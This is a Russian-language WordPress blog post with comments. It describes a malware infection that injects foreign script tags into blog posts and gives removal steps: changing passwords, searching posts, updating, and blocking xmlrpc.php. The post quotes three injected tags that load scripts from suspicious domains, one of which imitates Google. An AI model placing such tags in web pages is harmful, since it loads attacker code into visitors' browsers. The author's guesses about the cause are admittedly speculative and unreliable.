Чужие скрипты shareup.ru/social.js в статьях вордпресс, что это и как удалить

Дата: / Автор поста:

shareup.ru/social.js  в статьях
Здравствуйте все читатели и читательницы блога wpsovet. Первая статья и сразу же тревожная новость, новый вирус поражающий сайты вордпресс старых версий. ну что задрожали коленки, вирус с первого взгляда вообще не увидишь, а если ты не шаришь в кодах то вообще атас. Все по- порядку.

Предыстория.

У меня есть еще один блог, который я в данный момент забросил, из-за того что сам его загнал в угол, но об этом позже. Так вот я после долгого «не сидения» у блога и не обращая на него внимания, захотел зайти посмотреть статьи, тут просто случайно перехожу во вкладку «текст», пролистываю статью, и вижу вот такие строчки.где располагается чужой скрипт в статьях

У этого вируса есть много форм, точнее адресов, вот только некоторые из них:

<script src="//uptoliked.ru/widjets.js"></script>
<script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
<script src="//wq4.ru/js.js"></script>

Сначала я подумал что это работа какого-либо плагина, но потом офигев от своей преждевременной тупости (всего лишь 26 лет), начал копать в другом направлении. Я думаю, как и 99.9% и я тоже обратился к нашему другу гуглу, скажу сразу что инфы вообще нет, так короткие тикеты на форумах, где оформлены слабые ответы. Но собрав всю информацию по крупицам и самому включив голову, начал исправлять (хотя зачем, все равно блог забросил).

Так из догадок всего рунета, выяснилось несколько следствий, из за чего это происходит, у большинства стоят старые версии плагинов и самого wordpress, которые вообще не обновлялись, а надо было. И еще что примечательно, это скрипт очень непредсказуемо себя ведет, сайты могут дико тормозить из-за него, а бывает и нет, будто кто-то включает его на время, а потом отключает.

Метод удаления вируса.

А теперь строго по пунктам, идите, проверяйте и удаляйте эту пакость.

  1. В этом пункте не буду оригинален, меняем все пароли- от хостинга, от панели вордпресса (а лучше и пользователя тоже), и обязательно на базе данных. Если с хостингом и вордпрессом все понятно, то с базами лучше обратиться к хостеру, просто обратитесь в службу поддержки, чтобы сменили или установили пароль на базы, у меня как не прискорбно его вообще не было.
  2. Теперь самое неоригинальное занятие, чистим статьи от этого безобразия, у меня это занятие заняло минут сорок (это где то 70 статей), так что приготовьтесь к разрыву мозга. Заходим в записи через административную панель, и в правом верхнем углу жмем на поиск и вводим вот такой запрос «script src», если у вас этой бяки нет то список будет пуст, если есть, то вы счастливчик и смело можете идти на кухню за ведром кофе :) .поиск скрипта
  3. После того как нашли зараженные статьи, переходим в первую же и начинаем ее исправлять. Открываем вкладку текст и таким же способом через поиск ищем это скрипт. Нашли? Удаляем безжалостно, сохраняем и идем к следующей. И так до бесконечности.место в html
  4. Забыл один пункт, обновляйте всё, и плагины и движок. Потому как судя по всему, вирус поражает именно старые версии, а в новых разработчики видимо эту брешь закрыли. Вообще советуют сносить движок и ставить его по новой.
  5. Данный пункт был догадкой одного комментатора на форуме, он сказал что у него такая же ерунда была, он выяснил что атаки вируса идут на один не примечательный файлик в директивах вордпресса, я думаю большинство даже о нем и незнаю, называется он xmlrpc.php, и к нему надо запретить доступ всем, с помощь вот этого кода, который надо вставить в файл .htaccess, перед #EndWordpress
    <Files xmlrpc.php>
    order deny,allow
    Deny from all
    </Files>

Я не знаю что именно сработало из этого, но прошло 15  дней а код не появляется. На форумах максимальный срок у пользователей был 8 дней, так что думаю все нормально. Но но но, в статистике и по плагину Login Lockdown, вижу как эта нехорошая штука ломится на мой сайт, но видно ей не удается.

И на последок у этой заразы есть много форм, но смысл такой же, всё это вирус, причем очень странный.

На этом все, надеюсь статья вам помогла, тем более что пострадавших от этого вируса очень много, применяйте и следите. Нажмите обязательно кнопки социальных сетей, чтобы все узнали и проверили.

  1. 5
  2. 4
  3. 3
  4. 2
  5. 1
(5 голосов, в среднем: 5 из 5)

С уважением к читателям Лифанов Валентин.

Нажмите на кнопку социальных сетей, вам не сложно, а мне приятно.

Комментарии к этой супер статье.

  • Андрей

    Поиск нашел одну статью, но там я ничего не нашел за исключением вот этого:src="http://usvinternet.ru/wp-content/.......

    • Лифанов Валентин

      Ссылку оставил неправильную.

      • Андрей

        Это пример, я её не дописал

  • Андрей

    Еще в ченовике поиск нашел от смартреспондер

    • Лифанов Валентин

      Андрей сканируй все, если хоть в одной статье есть, меняй все что можно, пароли и прописывай правило в .htaccess. Никто не может сказать что это за зараза, но есть предположения, что эти файлы в один прекраснгый момент заполняться кодом и всем зараженным сайтам придет капец. А от смартреспондера, проверь куда они ведут, может тоже маскировка, как с гуглом.

      • Андрей

        Нет, это я с формой недавно мутил, а черновик остался. А где еще кроме статей проверять?

        • Лифанов Валентин

          Страницы проверь, там тоже могут. Про внедрение в сам движок не нашел информации, шел простой взлом.

  • Надежда Давыдова

    Привет! Спасибо за статью! Почистила свой сайт)) Нажала на все кнопки! Автору респект )) :grin:

    • Лифанов Валентин

      Привет, пожалуйста, рад был помочь.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

*

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Лифанов Валентин. ©2014 Все права защищены. Полное или частичное копирование запрещено.